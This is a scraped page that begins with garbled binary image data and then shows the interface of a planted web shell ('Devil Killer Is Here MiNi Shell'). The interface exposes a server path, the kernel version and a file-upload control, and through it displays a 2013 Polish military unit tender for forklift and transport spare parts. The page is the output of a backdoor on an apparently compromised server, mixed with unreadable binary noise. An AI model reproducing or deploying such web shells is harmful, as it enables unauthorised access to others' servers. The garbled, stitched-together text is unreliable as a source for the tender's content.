JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/63879-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa części zamiennych do sprzętu przeładunkowego.</b><br>
<b>Numer ogłoszenia: 63879 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.3rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części zamiennych do sprzętu przeładunkowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do sprzętu przeładunkowego obejmująca swym zakresem 13 zadań tj
Zadanie nr 1 - Części zamienne do podnośnika GPW 400T dla JW 4228 - Skład Dęblin, Zadanie nr 2 - Części zamienne do podnośnika GPW 2010, Zadanie nr 3 - Części zamienne do podnośnika GPW 2007, 2009, Zadanie nr 4 - Części zamienne do podnośnika LUNA TH20-1200, Zadanie nr 5 - Części zamienne do podnośnika RAK, Zadanie nr 6 - Części zamienne do wózka transportowego WNA 1320, Zadanie nr 7 - Części zamienne do podnośnika widłowego BALKANCAR, Zadanie nr 8 - Części zamienne do podnośnika GPW 400T dla RWT Żurawica, Zadanie nr 9 - Części zamienne do podnośników widłowych WW-1206, 1207, 1217, Zadanie nr 10 - Części zamienne do wózka platformowego WAN 1302, Zadanie nr 11 - Części zamienne do podnośnika RAK 4A-4B, Zadanie nr 12 - Części zamienne do wózka transportowego WNA 1320 Zadanie nr 13 - Części zamienne różne do sprzętu transportowego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca przystępujący do przetargu obowiązany jest wnieść wadium przed  upływem terminu składania ofert tj. do dnia 17.05.2013r. do godz. 10:00, w wysokości:  
dla zadania nr 4  -  230,00 zł
dla zadania nr 6  -  130,00 zł
dla zadania nr 8  -  130,00 zł
dla zadania nr 9  -   310,00 zł
dla zadania nr 11 -  100,00 zł
dla zadania nr 12 -  250,00 zł
dla zadania nr 13 -  150,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony druk OFERTA, 2. Wypełniony formularz cenowy w zakresie zadań, których realizację wykonawca zaoferuje, 3. Oryginał lub kopię pełnomocnictwa:
a) dla osoby,-osób podpisującej,-cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu z właściwego rejestru). 
b)dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu  albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie, 4. W przypadku, gdy wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go 
z nimi stosunków - zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie należy złożyć w formie oryginału.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ust. 1 ustawy Pzp, dopuszcza możliwość dokonywania stosownych zmian w umowie na mocy porozumienia stron, w następujących przypadkach: 
a) zmiany Odbiorcy;
b) zmiany terminu wykonania umowy - w przypadku, gdy z powodu siły wyższej nie jest możliwe wykonanie przedmiotu umowy w umówionym terminie;
c) przedłużenia terminu wykonywania umowy o okres nie dłuższy niż okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą lub sądem powszechnym - w przypadku, gdy zostało wniesione odwołanie w postępowaniu o udzielenie zamówienia publicznego;
d) zmiany wynagrodzenia - w przypadku zmiany przepisów prawnych (np. zmiana stawki podatku VAT), jeżeli wpływają one na wysokość należnego wykonawcy wynagrodzenia - zgodnie ze zmienionymi przepisami;
e) zmiany przedmiotu umowy - gdy przedmiot umowy nie będzie dostępny na rynku z powodu zaprzestania jego produkcji, pod warunkiem, że produkt zamienny spełnia wymagania zawarte w SIWZ oraz pod warunkiem, że cena nie ulegnie podwyższeniu;
f) w innych przypadkach - jeżeli ich zmiana jest konieczna w związku ze zmianą przepisów prawa, zmiany decyzji wydawanych przez Ministra Obrony Narodowej bądź zmiany wytycznych przełożonych Zamawiającego o ile powyższe zmiany mają wpływ na wykonanie zawartej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.3rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228, 30-901 Kraków, ul. Montelupich 3, bud. 28, pok. 24- Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:00, miejsce: Jednostka Wojskowa 4228, 30-901 Kraków, ul. Montelupich 3, bud. 28 - kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika GPW 400T dla JW 4228 - Skład Dęblin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika GPW 400Ttj.:
1. ŁOŻYSKO STOŻKOWE 
2. ŁOŻYSKO STOŻKOWE 
3. NAKRĘTKA KORONKOWA 
4. PIERŚCIEŃ PROWADZĄCY 
5. PIERŚCIEŃ ZGARNIAJĄCY 
6. PIERŚCIEŃ ZZ 60x70x5/7, 
7. PRZEWÓD ELAST.,
08. PRZEWÓD ELAST. P51-P52-211-20x650, 
9. PRZEWÓD ELAST. P51-P51-111-8-800, 
10. PRZEWÓD ELAST. P51-P51-111-8-950, 
11. PRZEWÓD ELAST. P51-P52-211-13x350, 
12. PRZEWÓD ELAST. P51-P52-211-10-350,  
13. PRZEWÓD ELAST. P52-P51-111-10x800, 
14. PRZEWÓD ELAST. P52-P51-111-13x650, 
15. PRZEWÓD ELAST. P52-P52-211-20-450, 
16. ROLKA P30-5.1,0,20,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika GPW 2010.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika GPW 2010, tj. (FILTR OLEJU SILNIKOWEGO, KOŁO KORONKOWE, AGREGAT ORSTA KOLUMNA, AMORTYZATOR B2519.27.00, FILTR OLEJU SILNIKOWEGO AD3152UR, POMPA HAMULCOWA, PRZEWÓD HAMUL. 8. SERWOMECHANIZM HAM., FILTR OLEJU HYDRAULICZNY).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika GPW 2007, 2009.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika GPW 2007, 2009, (KRÓCIEC SSĄCY, CYLINDEREK, ŻARÓWKA SAMOCHODOWA , BEZPIECZNIK TOPIKOWY, PRZEŁĄCZNIK KIERUNKOWSKAZÓW, STACYJKA).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika LUNA TH20-1200.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika LUNA TH20-1200, (PRZEWÓD WYSOKIEGO CIŚNIENIA, STACYJKA, PODKŁADKA, PODKŁADKA, PRZEJŚCIÓWKA, FILTR ZWROTNY, NAGRZEWNICA, NAKRĘTKA, PIERŚCIEŃ TŁOKOWY, PIERŚCIEŃ USZCZELNIAJĄCY 91040002155, PIERŚCIEŃ USZCZELNIAJĄCY 92042108155, FARTUCH, PRZEJŚCIÓWKA 92113002670).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika RAK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa Dostawa części zamiennych do podnośnika RAK, tj. DŻWIGIENKA SPRZĘGŁA, KOŁO KIEROWNICZE LEWE 123-05 0014, KOŁO KIEROWNICZE PR.123-05-0022, OKŁADZINA TARCZY SPRZĘG 50-01-025, POMPA OLEJOWA 0042062010 S-312, POMPA OLEJOWA 123-02-0032.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa części zamiennych do wózka transportowego WNA 1320.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do wózka transportowego WNA 1320,tj. KORPUS MOSTU TYLNEGO, KORPUS PRZEKŁADNI STYK STAŁY, STEROWNIK NTW-10, STEROWNIK NTW-12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika widłowego BALKANCAR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika widłowego BALKANCAR, tj.: WKŁAD FILTRA SSĄCEGO KTM 2195, FILTR ODSTOJNIK B41335179, FILTR POWIETRZA KTM 2346, FILTR 5571-03-00-00, FILTR 6860-5-02-00-00, FILTR POWIETRZA VSIB-4-5-00-00-00-07, FILTR W 26 EK 00023.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika GPW 400T dla RWT Żurawica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika GPW 400T, tj.:LAMPA BŁYSKOWA OBROTOWA POMARAŃCZOWA LBO-10-12V, PASY BEZPIECZ. ZE ZWIJAKIEM BR3, OBRĘCZ 9.00-15,3, PRZEKAŹNIK, PRZEKAŹNIK T88-70, ROZDZIELACZ JAZDY (BLOK STERUJĄCY) ERS-4-02, PRZEŁĄCZNIK DŹWIGNIOWY 
TŁOCZYSKO CYLINDRA POCHYŁU.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa części zamiennych do podnośników widłowych WW-1206, 1207, 1217.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośników widłowych WW-1206, 1207, 1217, tj.: ŁOŻYSKO CBK 468, CYLINDER PRZECHYŁU, STYK RUCHOMY, STYK STAŁY, NAWROTNIK, WOLTOMIERZ 0-30V, BIEŻNIK Z TARCZĄ TYLNY, BIEŻNIK Z TARCZĄ PRZEDNI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa części zamiennych do wózka platformowego WAN 1302.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do wózka platformowego WAN 130, tj.: PEDAŁ ZADAJNIKA JAZDY FP-2, WYŚWIETLACZ STANU NAŁADOWANIA BATERII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika RAK 4A-4B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika RAK 4A-4B, tj.: NAKŁADKA PEDAŁU, WSKAŹNIK PODWÓJNY, CYLINDER PRZECHYŁU, ODŁĄCZNIK AKUMULATORA, POMPA HAMULCOWA, CHŁODNICA (C-330), KOREK CHŁODNICY (C-330), KRANIK SPUSTU WODY, PRZEWÓD GUMOWY DOLNY, PRZEWÓD GUMOWY GÓRNY, OSŁONA OPERATORA (DASZEK), LICZNIK MOTOGODZIN, LAMPA BŁYSKOWA OBROTOWA  POMARAŃCZOWA, WĄŻ GIĘTKI L-400, WĄŻ GIĘTKI L-900, WĄŻ GIĘTKI L-1000, WĄŻ GIĘTKI L-1200, PASEK KLINOWY HA 13X10X1250, PASEK KLINOWY HA 13X8X1157.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa części zamiennych do wózka transportowego WNA 1320.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do wózka transportowego WNA 1320,tj. SZCZĘKA HAMULCA PRZÓD, WYŁĄCZNIK ZAPŁONU (STACYJKA) WZ-60, PRZEŁĄCZNIK KIERUNKU OBROTÓW, Łuk-80 S-41, SILNIK ELEKTRYCZNY PZSOB 24/65 2,5KW, WOLTOMIERZ MER-72TM 0-100V, KOŁO HAMULCOWE, KOŁO KIEROWNICY, SZCZĘKA HAMULCOWA
PŁYTA SKRĘTNA (NISKA)
AMPEROMIERZ MER-72/TMC 150A
TARCZA KOŁA 
PIERŚCIEŃ TARCZY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa części zamiennych różnych do sprzętu transportowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych różnych do sprzętu transportowego, tj.: PRZEWÓD LGY 16, PRZEWÓD LGY 35, PRZEWÓD LGY 50, SIEDZENIE GRAMERA, KOŃCÓWKA KABLOWA FI 4, KOŃCÓWKA KABLOWA FI 5, KOŃCÓWKA KABLOWA FI 6, KOŃCÓWKA KABLOWA FI 8, KOŃCÓWKA KABLOWA FI 10, KOŃCÓWKA KABLOWA FI 12, ZAWOREK BEZDĘTKOWY TR414 Z NAKŁADKĄ CHROM. 11,3MM, ZAWOREK BEZDĘTKOWY TR414, ŁATKA DĘTKI OKRĄGŁA FI30MM, ŁATKA DĘTKI OKRĄGŁA FI45MM, ŁATKA DĘTKI OKRĄGŁA FI75MM, ŁATKA OPONY KWADRATOWA 35X35MM, ŁATKA OPONY KWADRATOWA 60X60MM, ŁATKA OPONY KWADRATOWA 67X67MM, ŁATKA OPONY KWADRATOWA 45X45MM, KOŁEK DO ŁATANIA OPON A-6, KOŁEK DO ŁATANIA OPON A-4,5, KOŁEK DO ŁATANIA OPON B-8, KOŁEK DO ŁATANIA OPON B-10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
